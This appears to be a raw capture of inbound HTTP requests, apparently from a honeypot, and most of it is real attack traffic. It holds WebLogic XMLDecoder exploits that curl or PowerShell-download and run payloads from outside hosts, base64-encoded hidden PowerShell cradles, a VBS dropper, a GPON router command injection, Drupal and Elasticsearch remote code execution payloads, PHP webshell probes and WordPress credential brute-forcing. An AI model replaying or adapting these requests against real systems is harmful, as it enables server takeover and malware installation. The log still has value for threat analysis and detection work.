Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Connection: Keep-Alive
Content-Type: text/xml; Charset=UTF-8
Accept: */*
Accept-Language: zh-cn
Referer: http://x.x.x.x:7001/wls-wsat/CoordinatorPortType
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Length: 742
Host: x.x.x.x:7001
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<void class="java.lang.Thread" method="currentThread">
<void method="getCurrentWork">
<void method="getResponse">
<void method="getWriter"><void method="write"><string>xmldecoder_vul_test</string></void></void>
</void>
</void>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /c5Zh.up?uniqueId=06982&module=../../server/default/deploy&qqfile=7DzVUYUXUL4PC5mXyl0QfYC5c3c.ear HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/octet-stream
Content-Length: 6570
POST http://45.33.125.170/cgi/test HTTP/1.1
Host: x.x.x.x
Content-Length: 32
Accept-Encoding: gzip, deflate, compress
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36
524cd51857b155c854b30023159f86b6
POST http://check.proxyradar.com/azenv.php?auth=149415121023&a=PSCMN&i=1082769120&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅpÈ!3Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl
POST http://185.17.73.141:6666/ HTTP/1.0
Content-length: 24
Connection: close
ho:128.199.140.88:8080
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 847
Host: x.x.x.x:7001
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('http://down.idc3389.top/downloader.exe','C:/Windows/temp/searsvc.exe');start C:/Windows/temp/searsvc.exe</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://check.proxyradar.com/azenv.php?auth=149486678335&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://f3.mi-stat.gslb.mi-idc.com/diagnoses/v1/report HTTP/1.1
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: f3.mi-stat.gslb.mi-idc.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 369
n=174224137064716&d=HCgAGAAYABgAABgHaHR0cGFwaRwYB2h0dHBhcGkYATAYFjQuNC40LVY3LjAuNS4wLktYRE1JQ0kYDG1vYmlsZS1IU1BBKxgOMTE0LjEyMS4yMzkuNDMcGAblm73lpJYYBuWNsOWwvBgAGAAAGhwYE2FwcC5jaGF0LnhpYW9taS5uZXQZHBgNNTQuMjU1LjE4NC4xNhUAFQIWwgMVABsAAAAYD2NvbS54aWFvbWkueG1zZhgPY29tLnhpYW9taS54bXNmGBY0LjQuNC1WNy4wLjUuMC5LWERNSUNJAAA%3D&t=1495539066516&s=030CC54956FE65B6A1331022AE7C7597
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Åt(ÛÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îgFY›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å®}fi›Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î(π+Y›∆√«∆fl
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 34
Cache-Control: no-cache
log=jamesatchue&pwd=jamesatchuepwd
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å:µÃ©Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î®Y›∆√«∆fl
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 29
Cache-Control: no-cache
log=admin&pwd=jamesatchuezxcv
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496058874463
X-Umeng-Sdk: Android/6.0.9 Block+Puzzle+Jewel%2F18+MI+4LTE%2F4.4.4+51CDA60BD75DD94418ADE9CC4CEEE046
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2709
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache
log=172&pwd=141414
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 19
Cache-Control: no-cache
log=admin&pwd=17212
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å:µÃ©Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î®Y›∆√«∆fl
POST /blog/xmlrpc.php HTTP/1.1
Host: x.x.x.x
Connection: keep-alive
Content-Length: 217
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US,en;q=0.8
Cookie: wordpress_test_cookie=WP+Cookie+check
<?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>admin</string></value></param><param><value><string>narecumsafie55</string></value></param></params></methodCall>
POST /mail/include.html?default_lang=2&lang_settings[2]=;http://aumentesusventas.com/email? HTTP/1.1
Host: x.x.x.x:32000
Accept: */*
Content-Length: 330
Expect: 100-continue
Content-Type: multipart/form-data; boundary=----------------------------46dd4a03fbeb
------------------------------46dd4a03fbeb
Content-Disposition: form-data; name="data"
exec("echo %COMPUTERNAME%", $computer);
foreach($computer as $ligne)
print("System information for ".$ligne."\n");
exec("whoami", $out);
foreach($out as $ligne)
print($ligne."\n");
------------------------------46dd4a03fbeb--
POST /UD/act?1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:schemas-upnp-org:service:LANHostConfigManagement:1#SetDHCPServerConfigurable
Content-Type: text/xml
Host: x.x.x.x:7547
Content-Length: 420
Connection: Keep-Alive
POST http://t14.proxy-checks.com/favicon.ico HTTP/1.1
Host: t14.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgA7AEkARQBYACAAJABXAEMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADAALgAyADUALgAxADQAOAAuADIAMAAyAC8AaQBtAGEAZwBlAHMALwB0AGUAcwB0AC8ARABMAC4AcABoAHAAJwApADsA</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:53.0) Gecko/20170101 Firefox/53.0
Host: drupal
Content-Type: application/x-www-form-urlencoded
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=system&mail[#type]=markup&mail[#markup]=id
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
axa=die((string)(111111111*9));
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache
log=admin&pwd=jamesatchueq
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
m=die('Hello, Peppa!'.(string)(111111111*9))
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 392
Cache-Control: no-cache
RqwNw93KMfuengvXLJrTiGln6laCOu+mqsBGSh3pSCELpdN4TRYp/su5EcNJYNHGdsGrhc77J4xWV3DASxWMuhukEWGR5v9IXhI8dyzqgnF1uI5qTbD293Y3l3Xf+IOasv02iucklKfsk7GxDfDY25BOxOcQlgGpqutucW3PBxcAjj7FraPz9q5s7PxkkLCqKWRPS1DMhPTghyvhMb5IqVwoZyWYWzqDL4Z4bwWi5gBHwgn/bR79QxeUB5GQa8wN3vckpe0GY4SnJZ2jdMywRPJFcrS2S977t3yc5rUa0gDGlQpJQpnnsiEDzE2Vy5PpdSQ9lZ7vlvSZ/G891M5xgdfwweIsUOHO634t/fg4fPWHeb0Y6jdoMB21F7wd1tU4QPie5R+4
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 424
Cache-Control: no-cache
R6xdx9/JMSk3viWaNgIzNwEpRe68Sgww7qnHKZhK+b5DjzyXOCEM/A4Zadrn9GCAXLGShmwW6viWZ07nqx/ucZZqMk7Gx+77IJSo4TkMuO8Kgn2umLzBs+UQdGPP/WY5Oxoml7uAtYuiKFJIbzoYRwDp4mfthWhZjctP3/uEOEq/r1PoGivkf8tOk08O5B/zfNzntsz1BZTOu1OtX1O9v46ZTbzEJCsvqqzGw/wSCRjU1+cbQDUAF79UI4prtB1W/HmedpOcGMn8zz5qEcjWaRB8QwWAVZGNb+qxF5gyrPSzvrlZ23Sxfi/D3H3IlxWiexi2ov7gOwOJOL/4hRNi3BV0aXmAIy29Ek08MHKdnftNqNUCSFPEnS//GoWxBd0Sr0pbsy8U0Ub5lPBWh0pcCkll4tnEi8ws1pyO5JK5
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∫ÍxÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îà„'Y›∆√«∆fl
POST http://gj.applog.uc.cn/collect?zip=gzip&pf=android&pn=com.uc.browser.en&ve=10.9.0&vc=104&sdk_ve=3.0.10&sdk_vc=212&sf=EVCoreProductMediation&app=0652abada25c&uuid=15bf5ee0f45-af8795dc3d31775f&vno=1495204770251&chk=f6cac54e HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Connection: keep-alive
Host: gj.applog.uc.cn
Transfer-Encoding: chunked
Content-Type: application/octet-stream
1bf
